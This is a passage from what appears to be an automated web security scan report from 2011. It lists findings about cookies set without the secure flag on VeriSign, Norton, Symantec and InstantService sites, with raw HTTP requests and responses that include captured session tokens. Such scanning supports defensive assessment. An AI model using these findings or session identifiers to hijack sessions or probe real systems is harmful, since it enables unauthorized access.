GET /links/5851/16144 HTTP/1.1 Host: admin.instantservice.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:36:50 GMT Server: Apache Pragma: no-cache Cache-Control: no-cacheSet-Cookie: JSESSIONID=0B3AF203D82136BD07783C04277FEF66; Path=/isservices P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Vary: User-Agent,Accept-Encoding Content-Length: 5858 Connection: close Content-Type: text/html;charset=utf-8 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en"> <head> <title>VRSN Sales A...[SNIP]...
6.4. https://admin.instantservice.com/links/5851/16145
Summary
Severity: Medium
Confidence: Firm
Host: https://admin.instantservice.com
Path: /links/5851/16145
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
JSESSIONID=13A178978A8AF485E01EA735265A1159; Path=/isservices
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /links/5851/16145 HTTP/1.1 Host: admin.instantservice.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:36:50 GMT Server: Apache Pragma: no-cache Cache-Control: no-cacheSet-Cookie: JSESSIONID=13A178978A8AF485E01EA735265A1159; Path=/isservices P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Vary: User-Agent,Accept-Encoding Content-Length: 5853 Connection: close Content-Type: text/html;charset=utf-8 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en"> <head> <title>VRSN Sales A...[SNIP]...
6.5. https://admin.instantservice.com/links/5851/39897
Summary
Severity: Medium
Confidence: Firm
Host: https://admin.instantservice.com
Path: /links/5851/39897
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
JSESSIONID=A931592882D97BC2DB5C2B6F4668C8C6; Path=/isservices
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /links/5851/39897 HTTP/1.1 Host: admin.instantservice.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:36:50 GMT Server: Apache Pragma: no-cache Cache-Control: no-cacheSet-Cookie: JSESSIONID=A931592882D97BC2DB5C2B6F4668C8C6; Path=/isservices P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Vary: User-Agent,Accept-Encoding Content-Length: 5946 Connection: close Content-Type: text/html;charset=utf-8 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en"> <head> <title>VRSN Sales U...[SNIP]...
6.6. https://onlinefamily.norton.com/familysafety/loginStart.fs
Summary
Severity: Medium
Confidence: Firm
Host: https://onlinefamily.norton.com
Path: /familysafety/loginStart.fs
Issue detail
The following cookies were issued by the application and do not have the secure flag set:
JSESSIONID=C487A83A71391D525794280EAF628915; Path=/familysafety
formVersion=1315604755623; Path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /familysafety/loginStart.fs?inid=us_2010June_NOF HTTP/1.1 Host: onlinefamily.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:45:55 GMT Server: Apache Set-Cookie: user_pref_lang=eng; Expires=Thu, 08-Dec-2011 21:45:55 GMT; Path=/ Set-Cookie: formVersion=1315604755623; Path=/Set-Cookie: JSESSIONID=C487A83A71391D525794280EAF628915; Path=/familysafety Cache-Control: no-cache,no-store,must-revalidate,max-stale=0 Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Type: text/html;charset=UTF-8 Connection: close Vary: Accept-Encoding Content-Length: 37906 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <...[SNIP]...
6.7. https://securitycenter.verisign.com/celp/enroll/outsideSearch
Summary
Severity: Medium
Confidence: Firm
Host: https://securitycenter.verisign.com
Path: /celp/enroll/outsideSearch
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
JSESSIONID=OqJ57BcEDySGMZg17yokdHt03FquFgyYGEezg44I0uZ1diTyCIN7!-1800460983; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /celp/enroll/outsideSearch HTTP/1.1 Host: securitycenter.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Fri, 09 Sep 2011 21:46:33 GMT Content-length: 408 Content-type: text/html Last-Modified: Mon, 12 Jan 2004 23:04:38 GMTSet-Cookie: JSESSIONID=OqJ57BcEDySGMZg17yokdHt03FquFgyYGEezg44I0uZ1diTyCIN7!-1800460983; path=/ Accept-Ranges: bytes Connection: close <html> <head> <title>VeriSign Retail</title> <META HTTP-EQUIV="Pragma" CONTENT="no-cache"> <META HTTP-EQUIV="Expires" CONTENT="-1"> </head> <body bgcolor="#ffffff"> <h1>System Unavailable</h1>...[SNIP]...
6.8. https://securitycenter.verisign.com/celp/enroll/retail
Summary
Severity: Medium
Confidence: Firm
Host: https://securitycenter.verisign.com
Path: /celp/enroll/retail
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
JSESSIONID=OqIZWIQD33u9AZA3Ap2HnemKDA9cEWwlrgBQZ31zh5e1fWNs3qL2!-1800460983; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /celp/enroll/retail;jsessionid=OqE0Tm00XOqZIfwiE7FczMWMMOkVjg1izXQLLDKjlcyrNzI8OY4a!-1800460983 HTTP/1.1 Host: securitycenter.verisign.com Connection: keep-alive Referer: http://www.verisign.com/code-signing/index.html?tid=a_box User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=OqE0Tm00XOqZIfwiE7FczMWMMOkVjg1izXQLLDKjlcyrNzI8OY4a!-1800460983
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Fri, 09 Sep 2011 21:43:53 GMT Content-length: 408 Content-type: text/html Last-Modified: Mon, 12 Jan 2004 23:04:38 GMTSet-Cookie: JSESSIONID=OqIZWIQD33u9AZA3Ap2HnemKDA9cEWwlrgBQZ31zh5e1fWNs3qL2!-1800460983; path=/ Accept-Ranges: bytes <html> <head> <title>VeriSign Retail</title> <META HTTP-EQUIV="Pragma" CONTENT="no-cache"> <META HTTP-EQUIV="Expires" CONTENT="-1"> </head> <body bgcolor="#ffffff"> <h1>System Unavailable</h1>...[SNIP]...
6.9. https://securitycenter.verisign.com/celp/enroll/upsell
Summary
Severity: Medium
Confidence: Firm
Host: https://securitycenter.verisign.com
Path: /celp/enroll/upsell
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
JSESSIONID=OqE10CQDoczcE12dL3a6BYK7SmniMvBhWXtc1NQr68hhq3LGOaAg!-1800460983; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /celp/enroll/upsell?application_locale=VRSN_US&originator=VeriSign:CELP&bundle_id=MSIECS002 HTTP/1.1 Host: securitycenter.verisign.com Connection: keep-alive Referer: http://www.verisign.com/code-signing/index.html?tid=a_box User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Response
HTTP/1.1 302 Moved Temporarily Server: Sun-ONE-Web-Server/6.1 Date: Fri, 09 Sep 2011 21:27:18 GMT Content-type: text/html;charset=UTF-8 Location: https://securitycenter.verisign.com/celp/enroll/retailSet-Cookie: JSESSIONID=OqE10CQDoczcE12dL3a6BYK7SmniMvBhWXtc1NQr68hhq3LGOaAg!-1800460983; path=/ Content-Length: 303 <html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://securitycenter.verisign.co...[SNIP]...
6.10. https://onlinefamily.norton.com/familysafety/basicpremium.fs
Summary
Severity: Information
Confidence: Certain
Host: https://onlinefamily.norton.com
Path: /familysafety/basicpremium.fs
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
formVersion=1315604730862; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /familysafety/basicpremium.fs HTTP/1.1 Host: onlinefamily.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:45:30 GMT Server: Apache Set-Cookie: user_pref_lang=eng; Expires=Thu, 08-Dec-2011 21:45:30 GMT; Path=/Set-Cookie: formVersion=1315604730862; Path=/ Cache-Control: no-cache,no-store,must-revalidate,max-stale=0 Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Type: text/html;charset=UTF-8 Connection: close Vary: Accept-Encoding Content-Length: 41316 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <title>Web Moni...[SNIP]...
6.11. https://renewals.symantec.com/renewals/application
Summary
Severity: Information
Confidence: Certain
Host: https://renewals.symantec.com
Path: /renewals/application
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
entryURL=/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store HTTP/1.1 Host: renewals.symantec.com Connection: keep-alive Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621879623-New%7C1336357879623%3B%20event69%3Devent69%7C1336357879625%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/5
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:31:50 GMT Content-Type: text/html; charset=utf-8 Set-Cookie: entryURL=/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store Content-Length: 21436 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /> <!-- BEGIN ...[SNIP]...
6.12. https://ssl-certificate-center.verisign.ch/process/retail/console_login
Summary
Severity: Information
Confidence: Certain
Host: https://ssl-certificate-center.verisign.ch
Path: /process/retail/console_login
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
TLTHID=34B2B6D6DB2D10DB60D0D1C1D953344E; Path=/; Domain=.verisign.ch
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /process/retail/console_login HTTP/1.1 Host: ssl-certificate-center.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:46:42 GMT Server: Apache Set-Cookie: TLTHID=34B2B6D6DB2D10DB60D0D1C1D953344E; Path=/; Domain=.verisign.ch Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=utf-8 Content-Length: 11755 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF...[SNIP]...
6.13. https://ssl-certificate-center.verisign.ch/process/retail/production_trial_initial
Summary
Severity: Information
Confidence: Certain
Host: https://ssl-certificate-center.verisign.ch
Path: /process/retail/production_trial_initial
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
TLTHID=34FAB86EDB2D10DB68C5A5440567C536; Path=/; Domain=.verisign.ch
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /process/retail/production_trial_initial?productType=HASGCServer&application_locale=VRSN_CH HTTP/1.1 Host: ssl-certificate-center.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Date: Fri, 09 Sep 2011 21:46:42 GMT Server: Apache Set-Cookie: TLTHID=34FAB86EDB2D10DB68C5A5440567C536; Path=/; Domain=.verisign.ch Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Location: https://ssl-certificate-center.verisign.ch/process/retail/production_trial_product_selector?uid=fb69022a800687aee2281387e3be2beb&product=GHAPT001 Content-Length: 0 Vary: Accept-Encoding Connection: close Content-Type: text/html
6.14. https://ssl-certificate-center.verisign.com/process/retail/console_login
Summary
Severity: Information
Confidence: Certain
Host: https://ssl-certificate-center.verisign.com
Path: /process/retail/console_login
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
TLTHID=35539628DB2D10DB528F9F6CAED9DACC; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /process/retail/console_login HTTP/1.1 Host: ssl-certificate-center.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:46:43 GMT Server: Apache Set-Cookie: TLTHID=35539628DB2D10DB528F9F6CAED9DACC; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=utf-8 Content-Length: 11759 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF...[SNIP]...
6.15. https://ssl-certificate-center.verisign.com/process/retail/production_trial_initial
Summary
Severity: Information
Confidence: Certain
Host: https://ssl-certificate-center.verisign.com
Path: /process/retail/production_trial_initial
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
TLTHID=35B1A6C8DB2D10DB52919F6CAED9DACC; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /process/retail/production_trial_initial HTTP/1.1 Host: ssl-certificate-center.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Date: Fri, 09 Sep 2011 21:46:44 GMT Server: Apache Set-Cookie: TLTHID=35B1A6C8DB2D10DB52919F6CAED9DACC; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Location: https://ssl-certificate-center.verisign.com/process/retail/production_trial_product_selector?uid=21e134a09c6b802996d1066fe9c13ef5&product=GSPT001 Content-Length: 0 Vary: Accept-Encoding Connection: close Content-Type: text/html
6.16. https://ssl-certificate-center.verisign.com/process/retail/trustseal_trial_initial
Summary
Severity: Information
Confidence: Certain
Host: https://ssl-certificate-center.verisign.com
Path: /process/retail/trustseal_trial_initial
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
TLTHID=36315378DB2D10DB52939F6CAED9DACC; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /process/retail/trustseal_trial_initial HTTP/1.1 Host: ssl-certificate-center.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Date: Fri, 09 Sep 2011 21:46:45 GMT Server: Apache Set-Cookie: TLTHID=36315378DB2D10DB52939F6CAED9DACC; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Location: https://ssl-certificate-center.verisign.com/process/retail/trustseal_trial_new_account?uid=9e535ad90e202dd2be1657e6ee2caf70&product=TRUSTSEALTRIAL Content-Length: 0 Vary: Accept-Encoding Connection: close Content-Type: text/html
6.17. https://trust-center.verisign.ch/process/retail/console_login
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.ch
Path: /process/retail/console_login
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
TLTHID=37115F40DB2D10DB60DAD1C1D953344E; Path=/; Domain=.verisign.ch
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /process/retail/console_login HTTP/1.1 Host: trust-center.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:46:46 GMT Server: Apache Set-Cookie: TLTHID=37115F40DB2D10DB60DAD1C1D953344E; Path=/; Domain=.verisign.ch Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=utf-8 Content-Length: 11715 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF...[SNIP]...
6.18. https://trust-center.verisign.ch/process/retail/trust_initial
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.ch
Path: /process/retail/trust_initial
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
TLTHID=372B7DB2DB2D10DB60DBD1C1D953344E; Path=/; Domain=.verisign.ch
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /process/retail/trust_initial HTTP/1.1 Host: trust-center.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Date: Fri, 09 Sep 2011 21:46:46 GMT Server: Apache Set-Cookie: TLTHID=372B7DB2DB2D10DB60DBD1C1D953344E; Path=/; Domain=.verisign.ch Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Location: https://trust-center.verisign.ch/process/retail/trust_product_selector?uid=2f451e38320cb4cf9a868171c06fe1c9&product=TRUSTSEAL001 Content-Length: 0 Vary: Accept-Encoding Connection: close Content-Type: text/html
6.19. https://trust-center.verisign.com/favicon.ico
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /favicon.ico
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
TLTHID=6B107EF0DB2A10DB6A8ACEC4D1E75D2A; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /favicon.ico HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=692D91C2DB2A10DB44B9B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:45 GMT Server: Apache Set-Cookie: TLTHID=6B107EF0DB2A10DB6A8ACEC4D1E75D2A; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:07 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 4710 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/x-icon ...[SNIP]...
6.20. https://trust-center.verisign.com/process/retail/console_login
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /process/retail/console_login
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
TLTHID=383DEE10DB2D10DB49FEB1847A7DDBAF; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /process/retail/console_login HTTP/1.1 Host: trust-center.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:46:48 GMT Server: Apache Set-Cookie: TLTHID=383DEE10DB2D10DB49FEB1847A7DDBAF; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=utf-8 Content-Length: 12062 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF...[SNIP]...
6.21. https://trust-center.verisign.com/process/retail/help_and_support
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /process/retail/help_and_support
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
TLTHID=3B56F1FADB2D10DB4A1EB1847A7DDBAF; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /process/retail/help_and_support HTTP/1.1 Host: trust-center.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:46:53 GMT Server: Apache Set-Cookie: TLTHID=3B56F1FADB2D10DB4A1EB1847A7DDBAF; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=utf-8 Content-Length: 138732 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF...[SNIP]...
6.22. https://trust-center.verisign.com/process/retail/redirect
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /process/retail/redirect
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
TLTHID=3F6ECAD8DB2D10DB52FC9F6CAED9DACC; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /process/retail/redirect HTTP/1.1 Host: trust-center.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Date: Fri, 09 Sep 2011 21:47:00 GMT Server: Apache Set-Cookie: TLTHID=3F6ECAD8DB2D10DB52FC9F6CAED9DACC; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Location: https://trust-center.verisign.com/process/retail/console_home?uid=a5f0b94a4c89f47ae217b662fc5fdac5 Content-Length: 0 Vary: Accept-Encoding Connection: close Content-Type: text/html
6.23. https://trust-center.verisign.com/process/retail/session_timeout
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /process/retail/session_timeout
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
